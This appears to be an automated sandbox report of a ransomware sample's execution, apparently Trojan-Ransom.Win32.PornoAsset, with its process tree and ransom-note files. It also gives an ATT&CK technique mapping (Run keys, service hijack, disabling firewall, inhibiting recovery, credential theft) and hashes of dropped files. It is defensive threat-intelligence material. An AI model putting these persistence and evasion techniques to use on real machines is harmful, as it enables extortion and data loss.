"C:\Windows\SysWow64\drivers\spools.exe" "C:\Windows\system32\taskmgr.exe" /4
1⤵
- Sets service image path in registry
- Modifies system executable filetype association
- Adds Run key to start application
- Enumerates connected drives
- System Location Discovery: System Language Discovery
PID:10880
- C:\Windows\SysWOW64\taskmgr.exe
  C:\Windows\system32\taskmgr.exe /4
  2⤵
  - System Location Discovery: System Language Discovery
  PID:12128

C:\Windows\SysWow64\drivers\spools.exe
"C:\Windows\SysWow64\drivers\spools.exe" "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --progress-window=0 --install-start-time-no-uac=564988026
1⤵
- Sets service image path in registry
- Modifies system executable filetype association
- Adds Run key to start application
- Enumerates connected drives
- System Location Discovery: System Language Discovery
PID:6296
- C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
  C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --progress-window=0 --install-start-time-no-uac=564988026
  2⤵
  - Checks computer location settings
  - Loads dropped DLL
  - Adds Run key to start application
  - Checks system information in the registry
  - Drops file in Windows directory
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of SetWindowsHookEx
  PID:11336
- - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
    C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id= --annotation=main_process_pid=11336 --annotation=metrics_client_id=02b0a231168748799a97bfe61e8602aa --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.10.2.705 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x74729a24,0x74729a30,0x74729a3c
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:7012
- - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
    "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id=156dd9d3-7247-41ce-bfb5-769f4f44f933 --brand-id=yandex --partner-id=pseudoportal-ru --gpu-preferences=UAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --gpu-process-kind=sandboxed --field-trial-handle=2228,i,2557687886037413752,5623286189303027395,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2380 /prefetch:2
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:8132
- - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
    "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id=156dd9d3-7247-41ce-bfb5-769f4f44f933 --brand-id=yandex --partner-id=pseudoportal-ru --gpu-preferences=UAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --gpu-process-kind=trampoline --field-trial-handle=2204,i,2557687886037413752,5623286189303027395,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2240 /prefetch:6
    3⤵
    - Loads dropped DLL
    PID:10972
- - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
    "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=ru --service-sandbox-type=none --user-id=156dd9d3-7247-41ce-bfb5-769f4f44f933 --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Network Service" --field-trial-handle=2164,i,2557687886037413752,5623286189303027395,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2696 --brver=24.10.2.705 /prefetch:3
    3⤵
    - Loads dropped DLL
    PID:8904
- - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
    "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=ru --service-sandbox-type=service --user-id=156dd9d3-7247-41ce-bfb5-769f4f44f933 --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Storage Service" --field-trial-handle=2904,i,2557687886037413752,5623286189303027395,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2704 --brver=24.10.2.705 /prefetch:8
    3⤵
    - Loads dropped DLL
    PID:6044
- - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
    "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=ru --service-sandbox-type=audio --user-id=156dd9d3-7247-41ce-bfb5-769f4f44f933 --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Audio Service" --field-trial-handle=3516,i,2557687886037413752,5623286189303027395,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3528 --brver=24.10.2.705 /prefetch:8
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:2476
- - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
    "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=ru --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-id=156dd9d3-7247-41ce-bfb5-769f4f44f933 --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Video Capture" --field-trial-handle=3860,i,2557687886037413752,5623286189303027395,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3924 --brver=24.10.2.705 /prefetch:8
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:8556
- - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
    "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=156dd9d3-7247-41ce-bfb5-769f4f44f933 --brand-id=yandex --partner-id=pseudoportal-ru --extension-process --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://brontp-pre.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --allow-prefetch --video-capture-use-gpu-memory-buffer --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3940,i,2557687886037413752,5623286189303027395,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3908 /prefetch:2
    3⤵
    - Checks computer location settings
    - Loads dropped DLL
    PID:11276
- - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
    "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --user-id=156dd9d3-7247-41ce-bfb5-769f4f44f933 --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Data Decoder Service" --field-trial-handle=4508,i,2557687886037413752,5623286189303027395,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4504 --brver=24.10.2.705 /prefetch:8
    3⤵
    - Loads dropped DLL
    PID:8580
- - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
    "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=156dd9d3-7247-41ce-bfb5-769f4f44f933 --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://brontp-pre.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --allow-prefetch --video-capture-use-gpu-memory-buffer --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4520,i,2557687886037413752,5623286189303027395,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4680 /prefetch:1
    3⤵
    - Checks computer location settings
    - Loads dropped DLL
    PID:6796
- - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
    "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=uwp_cookie_provider.mojom.UwpCookieProvider --lang=ru --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --user-id=156dd9d3-7247-41ce-bfb5-769f4f44f933 --brand-id=yandex --partner-id=pseudoportal-ru --process-name=uwp_cookie_provider.mojom.UwpCookieProvider --field-trial-handle=3028,i,2557687886037413752,5623286189303027395,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3864 --brver=24.10.2.705 /prefetch:8
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:8456
- - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
    "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=ru --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-id=156dd9d3-7247-41ce-bfb5-769f4f44f933 --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Импорт профилей" --field-trial-handle=5596,i,2557687886037413752,5623286189303027395,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5608 --brver=24.10.2.705 /prefetch:8
    3⤵
    - Loads dropped DLL
    PID:8208
  - - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
      "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --enable-features=InstallerNewIdentity2024 --chrome-session-import="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default" --chrome-session-import-result="C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\Temp\scoped_dir8208_400993287\yandex_imported_session_file"
      4⤵
      Loads dropped DLL
      Checks system information in the registry
      System Location Discovery: System Language Discovery
      Enumerates system info in registry
      PID:7672
    - - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
        
        C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data" --url=https://crash-reports.browser.yandex.net/submit --annotation=install_date=1730844765 --annotation=last_update_date=1730844765 --annotation=launches_after_update=1 --annotation=machine_id=488dca4c15f9a1d330ad312b391a804e --annotation=main_process_pid=7672 --annotation=metrics_client_id=02b0a231168748799a97bfe61e8602aa --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.10.2.705 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x74729a24,0x74729a30,0x74729a3c
        5⤵
        Loads dropped DLL
        
        PID:11528
- - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
    "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=156dd9d3-7247-41ce-bfb5-769f4f44f933 --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://brontp-pre.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --video-capture-use-gpu-memory-buffer --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5676,i,2557687886037413752,5623286189303027395,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5700 /prefetch:1
    3⤵
    - Checks computer location settings
    - Loads dropped DLL
    PID:8960
- - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
    "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=156dd9d3-7247-41ce-bfb5-769f4f44f933 --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://brontp-pre.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --video-capture-use-gpu-memory-buffer --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5868,i,2557687886037413752,5623286189303027395,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5884 /prefetch:1
    3⤵
    - Checks computer location settings
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1404
- - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
    "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=156dd9d3-7247-41ce-bfb5-769f4f44f933 --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://brontp-pre.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --video-capture-use-gpu-memory-buffer --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4344,i,2557687886037413752,5623286189303027395,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4236 /prefetch:1
    3⤵
    PID:11220
- - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
    "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --user-id=156dd9d3-7247-41ce-bfb5-769f4f44f933 --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Data Decoder Service" --field-trial-handle=3480,i,2557687886037413752,5623286189303027395,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4752 --brver=24.10.2.705 /prefetch:8
    3⤵
    PID:9840
- - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
    "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --user-id=156dd9d3-7247-41ce-bfb5-769f4f44f933 --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Data Decoder Service" --field-trial-handle=1064,i,2557687886037413752,5623286189303027395,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2588 --brver=24.10.2.705 /prefetch:8
    3⤵
    PID:11808
- - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
    "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=156dd9d3-7247-41ce-bfb5-769f4f44f933 --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://brontp-pre.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --ya-custo-process --enable-instaserp --video-capture-use-gpu-memory-buffer --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=6404,i,2557687886037413752,5623286189303027395,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=6452 /prefetch:1
    3⤵
    PID:2372

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:10056

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6984

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:11604

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RETURN FILES.txt
1⤵
PID:10252

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\644766b87d4a43f29e54ca1d3494ca01 /t 1924 /p 10104
1⤵
PID:2100

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\61fefdcfd2084ac79463428969b53116 /t 5480 /p 4640
1⤵
PID:4156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6016 -ip 6016
1⤵
PID:8464

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.PornoAsset.dggw-f0c7d7525fdd13a49730e5cef8d6ea3d95361dbd439082c2c0701139460fa708.exe#$\05jyk078zz_Wannadie.txt
1⤵
PID:5716

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Browser Extensions

T1176

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Time Discovery

T1124

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\S-1-5-21-2437139445-1151884604-3026847218-1000\desktop.ini.exe

Filesize
948KB

MD5
66eb758cbcc3f3f42fdddce77df5f2b3

SHA1
eeb211cb9a53390ec54c03a66393f37871319972

SHA256
70b92397e2b2d66850888890ec092fddc6f59fc228b5c7e3cf2e1892f1611ac7

SHA512
2476f16be80cd75c31eb99fad84c26681d5e8df1e1395dac713b4d82a85f442f3e23c08b1c2e0ff3f535123f8f76a21553c5b374f5c77ae0d28e908e5feb9106

Download Submit
C:\$Recycle.Bin\S-1-5-21-2437139445-1151884604-3026847218-1000\{RecOveR}-bthbh__.Htm.exe

Filesize
957KB

MD5
74e938d9f31aa449e3e29594219e7431

SHA1
4ae0092699fc79fe2ac1d133cfe66b02d8915b02

SHA256
066503eb1847c38737a571ff5fa89a0b2a9c8c45b17e70055b93e11aa56bf270

SHA512
afafbda1b6cf6f14b84d19a275bea1ede6da2cdbd277efc98a8aebcecdf6b675c7897ebd75ac32aebd075ae9e51f88d3b1b54c696a3942471f9259fb97611110

Download Submit
C:\$Recycle.Bin\S-1-5-21-2437139445-1151884604-3026847218-1000\{RecOveR}-bthbh__.Png.exe

Filesize
1.0MB

MD5
bac5a818b2366f47f51115ecd64e6301

SHA1
4a5159387f735741ceda1728434a40b3e157a190

SHA256
dfbe39e1d3df9f3f86d8105f9d8df61f0926b5b73e51444e47ba4a0f6ef4bf3f

SHA512
2d3bb71d61796cdf8a1fe04a8f614f62364f5c632fe39f5072a582ca6f63e4598bd3e33e744e709fc4fd706832abccf70ed0d0d497169a87b712d049ab001809

Download Submit
C:\$Recycle.Bin\S-1-5-21-2437139445-1151884604-3026847218-1000\{RecOveR}-bthbh__.Txt.exe

Filesize
951KB

MD5
280679b072a9e34ea9ac6a20da7dc80a

SHA1
d21b6877b6c00eb8bf64ddf5dadfc95ed576901c

SHA256
c3ccfa6fa6b1aa56b46ad3acbf736712428bd5dab298d8bcccdea25021abb898

SHA512
2e417b3d270da8e278759ec8d272420b7a9b8c525d70a237ac068151c509e74050ed4fd9ff17a3bb3617b85d37a42d0a31793320247fb109af193cda8d885648

Download Submit
C:\$Recycle.Bin\z8I9C_Entschluesselungs_Anleitung.html

Filesize
22KB

MD5
f67f2b25e15f680e8fd409f3c30af2a3

SHA1
03055032c0291946aa51b3face535cf11e364e17

SHA256
96d5d56044f8e6572ed0b57023999455dd46a69c0e2117f32d2ea3c2dcb77e4f

SHA512
6b235122e260caf7e9e9976a3b45dcc265a543f89a82c3fc52408838b01a95a282f431618adca82ae5b0a232955824670f8e092a5f12371cce6f2a1052eb7391

Download Submit
C:\$Recycle.Bin\{RecOveR}-bthbh__.Htm

Filesize
9KB

MD5
bf03c02d52d6081195c1204725a73cad

SHA1
817f2293c579fb826265447bd0f9e743062dff6c

SHA256
eb5dd2acbee93b1e77f261ea6f8a0ac70455f37dfe486ef26ff83e136efab6d5

SHA512
30be83e29d9c4065d4f037320d288131c950d5f1a3ad37d703cc65e5c3afd695a955a649ca87b27cc0dc448778ddef85f23ddf9824a47486f181e854ed899e50

Download Submit
C:\$Recycle.Bin\{RecOveR}-bthbh__.Htm.exe

Filesize
957KB

MD5
8331b2c2b21e544bd3da44db73ea3224

SHA1
d5f607505570d3d911e96da57a30d8eee7292f9d

SHA256
cb7a85b6503f53db25d819fca946c14bf086158797ec137b930d9923bb4124b6

SHA512
7c524012c5ac83e2426f9489a9735d708ee623313b5f4162e31fb36bd3433de578ebb8688e2ffc9344753ecab57085c7c8c6607197874f50ad81cad4ab5fc55c

Download Submit
C:\$Recycle.Bin\{RecOveR}-bthbh__.Png

Filesize
93KB

MD5
1be5037027068cec459ab4f866b5e22f

SHA1
b38f76fadbe0b61177d8f3d4ef95d8bdf970f6c3

SHA256
be31bbabe578740e9a9d92931d8653a99a55c71a915c8b6483a522fe9eaeef23

SHA512
07189e34031aef99ad546f07ce4adcf01b911b78c073f0a7e5ff62d273614751cb458421840a434d1aead5acaa4ae4cab8b536ecb21acbb68fe76204f61b00cf

Download Submit
C:\$Recycle.Bin\{RecOveR}-bthbh__.Png.exe

Filesize
1.0MB

MD5
e2a5580373c2a13e47b95ec77c2eef62

SHA1
609c4539fce2bfa41d2628a135c1ad18071232ca

SHA256
a11cdc8f9715021f167b1b4eca3f3027ea25a8655ab30eeb5ca8272a31772280

SHA512
bc58e14db1d18f04ed6d111db63c6a259c2d98a4dab7c56d08d71a287e5e5f2e00b056cec51c29328f337c96cc653c674e393582421f65a7ef5862b7ed672efe

Download Submit
C:\$Recycle.Bin\{RecOveR}-bthbh__.Txt

Filesize
2KB

MD5
34713520f14e0f7a20abeb27ecb6d6b5

SHA1
b016f031c5c8ae385c5d7730e7357d1f4c05ac42

SHA256
df14c3a3c172c387f48acd85388e3d85d3331b86cf3bd9b6cd62fc209427a779

SHA512
cce26f9a540e965e9f9020b1defdd17bdeb39c121fe16ec23f4e11a4842c46f8e7a806a96ea64ac30b16da0e9bb0b3a3054b4e47dbe9359ba6f9942becf5ce09

Download Submit
C:\$Recycle.Bin\{RecOveR}-bthbh__.Txt.exe

Filesize
951KB

MD5
fb7fb6f58136fe8f85076475a6b2d128

SHA1
54a9c4a008f95725b486b9f5ad0eac8c2f0485f1

SHA256
c6aef813f4658a96d494794010c8f51c00ad7f4c67d468cce5fbf87b4e3ecea1

SHA512
00612bafcc3408d527596ca2ac54dff61c89183a829914065b842e15d1f12d6013e6711978906f37b00e38fa175cb5ef40c475f703614ad100a03e2c9bc339b9

Download Submit
C:\[email protected]

Filesize
2.6MB

MD5
edba5178f821bac1d41ee4dc014ba246

SHA1
567f4bc4f03b6526d019222540b37a57b1d56c1e

SHA256
bde330a15e9485277853f5a90f9df06661a0b96aed15130fa06d5d074ba00262

SHA512
4b7ea381429c862fed047e7d90dbf114141c63c3cb24543f18c0603f9da0146d6fa676209f528540b6f66fbbad8f52fc653f105eab7c402b072151577e633f1f

Download Submit
C:\Config.Msi\e58c7d2.rbs

Filesize
911B

MD5
fd002b964531cf1e421006324f87c099

SHA1
8bd1d265327253dd72f20e167681593f05968c3e

SHA256
a4896b8bed62555b73516f0a4f3a81dd638896993da6e0bd5a539ce20e0b5fac

SHA512
2fd9cb53d9472b568da9dd8fe8ae4519974d864fa561e56cf71b60404f2f482eb389be7458f02589f94b5fe007c6578e10dda2d867dbb6aec24d34066b63b9d8

Download Submit
C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe

Filesize
2.4MB

MD5
fc97164a5dddd55d2d1ac6cc6156771d

SHA1
cf7953ef61fd18941d2f9c1599ad01d5d57dd987

SHA256
778a127b88bb644a7c66d08932a446b85409fe7049bbae0dc15b9d364f2870f4

SHA512
d7ca2fc40a6dde28a567f86b5beb87c867f01e6832d7a49eafa9b3987b7e9ee992f6d5104181f19888f6e0af45a7e90b17ebeae489e3956fd537ce1ba02bc79c

Download Submit
C:\ProgramData\Yandex\YandexBrowser\service_update.log

Filesize
4KB

MD5
b3a530eb2b87604a648dfad2d1df36d6

SHA1
89f4ccb38f69c9b6b7df7e487150ba22d8cef4f8

SHA256
d41451c8ea4297f39d858c1fdc0f5a3e6095ce7a39ee000063b630005cd00757

SHA512
ab296edf3e533ff593a637949677a5573ec81d13e6bbf90a58e006d7d9cf8919874a8037a173aae2311d1f74e7f8aa16daf44c4465a6ce51bb619d3a78a59ef5

Download Submit
C:\Recovery\05jyk078zz_Wannadie.txt

Filesize
6KB

MD5
4dc1f07d37bca7ec40243047f1b63803

SHA1
5dd078a9a8f931645ff37723296ebe7a2aaafa59

SHA256
a2ab89592ae9ee9ad281b39fa34efa7dfd5854bf7935a9f13b6b5fb04372d2ba

SHA512
bca465ea7f788ddc58a20ef5100b7ef773807a2d5ea3a981b6f54fdd9804cbd93ee668644aaf91793ee4f0800ccbd7be4c8a2c7b95976a434c62b13cf46d6746

Download Submit
C:\Users\Admin\3D Objects\05jyk078zz_Wannadie.txt

Filesize
7KB

MD5
33a0cf34474ccda5ef4ce8450eb40d07

SHA1
1fb05156e28302c68ffa3277b51da00a6136025f

SHA256
f8c590b163c7f13db23fbb4f8c740641a76a6ab219db0f420a790321e7c2bfe0

SHA512
48bc23692d0e4443a5f5b859fb3f970707c36fccc7c85ab6b3b5b6438fa6f7d9d711159aec8b93497c3aedc4c8d3c51fc210784ccca46bc349071774e713dd83

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\357F04AD41BCF5FE18FCB69F60C6680F_394487CAFBCFB8C5917AD7A10924C8A7

Filesize
1KB

MD5
89d21325322e869363d0df12d82811c2

SHA1
47190c80163d08393a30ed17a3119da3d981a0e5

SHA256
3addb1f803c72dadf6421155760c49859ea159e00b93c12b1c619fdb69a07800

SHA512
eb44cfb89ced6a204ffe1b9a068fd056aaad2c85273832809fd59d361589119f5cb656219efb87fdbce4faec0054e4b24e7552dc17d2abf0fcbe31ababbc6ff5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9CB4373A4252DE8D2212929836304EC5_1AB74AA2E3A56E1B8AD8D3FEC287554E

Filesize
1KB

MD5
14eaa7b805deb05a005c8212989682a9

SHA1
0e51623a05a8dd2c4a0a9d3d67609c6fbcf6005e

SHA256
2fce71b2afbf25e1c350f3d5751ac03088ecf0abe4384945f495fe4fe5030cc9

SHA512
29d9ace62124df796e5dacee31340f5671c0292cdefdd013ef39322c7d162446ae1ac8dcaa78af2788bc274b78f90f62f9db054a09c17cf1ad947d3da88ff564

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

Filesize
1KB

MD5
c6e6b45a0fa07328966b92680cadb91d

SHA1
86ee39c2b9dd3650dced5355c1143ad895f5e082

SHA256
cf5160c17115c6129450741d39b1e5ac02cd62c4e70fba8672222cde2b0afc9f

SHA512
4071cee76345a6c540d596de90c92cbe1b613eabd39e55bac9231ecf79b3cf1ef0014651ffca4bdddd1c98be6a251f5249279e589fb91b0e3a53bf996e2ea5d1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\357F04AD41BCF5FE18FCB69F60C6680F_394487CAFBCFB8C5917AD7A10924C8A7

Filesize
536B

MD5
0217bf48dca692d4264e8ec8a0e27e16

SHA1
6b22d044d35cb29a4d0c2309f393f7ec9c1abf19

SHA256
